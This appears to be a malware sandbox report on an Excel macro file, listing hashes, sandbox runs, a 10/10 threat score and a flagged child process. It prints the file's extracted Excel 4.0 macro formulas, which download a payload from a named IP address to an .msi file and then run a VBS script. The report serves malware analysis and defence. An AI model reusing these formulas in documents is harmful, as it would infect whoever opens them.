General
-
Target
ce63fd007a13d7114025a424ea9610fe
-
Size
6KB
-
Sample
231222-r9f1jsdhfk
-
MD5
ce63fd007a13d7114025a424ea9610fe
-
SHA1
8697fd14323eadae5b308f55986801af64ce7241
-
SHA256
61cecdcb21970e419132feaede4c40666adc258221bdbfff1bd75f47f2b9f43b
-
SHA512
58fe231ddb93ee41e3cea32e042a071c5875082ea15b522bbd7bb9528b33e8ceed02258df9099cba82b6d09acc79a51cdb30ee5771e9044feb1d3b7326cc9bad
-
SSDEEP
192:NDSHuSdbrA2OmmfRU8UhHFBFYuCb98ylQKG+P:NkuWM2wW1FYHb98ylQe
Static task
static1
Behavioral task
behavioral1
Sample
ce63fd007a13d7114025a424ea9610fe.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ce63fd007a13d7114025a424ea9610fe.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Targets
-
-
Target
ce63fd007a13d7114025a424ea9610fe
-
Size
6KB
-
MD5
ce63fd007a13d7114025a424ea9610fe
-
SHA1
8697fd14323eadae5b308f55986801af64ce7241
-
SHA256
61cecdcb21970e419132feaede4c40666adc258221bdbfff1bd75f47f2b9f43b
-
SHA512
58fe231ddb93ee41e3cea32e042a071c5875082ea15b522bbd7bb9528b33e8ceed02258df9099cba82b6d09acc79a51cdb30ee5771e9044feb1d3b7326cc9bad
-
SSDEEP
192:NDSHuSdbrA2OmmfRU8UhHFBFYuCb98ylQKG+P:NkuWM2wW1FYHb98ylQe
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-